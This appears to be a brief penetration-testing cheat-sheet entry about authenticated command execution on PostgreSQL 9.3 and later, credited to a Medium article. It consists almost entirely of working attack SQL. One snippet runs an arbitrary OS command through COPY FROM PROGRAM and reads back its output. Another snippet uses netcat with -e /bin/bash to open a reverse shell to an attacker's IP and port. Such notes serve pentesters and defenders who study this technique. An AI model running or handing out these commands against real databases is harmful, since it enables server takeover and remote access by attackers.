postgres

Arbitary RCE 9.3 - latest (11.2)

DROP TABLE IF EXISTS kashz; CREATE TABLE kashz(out text);
COPY kashz FROM PROGRAM '<command>'; SELECT * FROM kashz;

# shell
COPY kashz from PROGRAM '/usr/bin/nc -e /bin/bash IP PORT';

Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > LatestMedium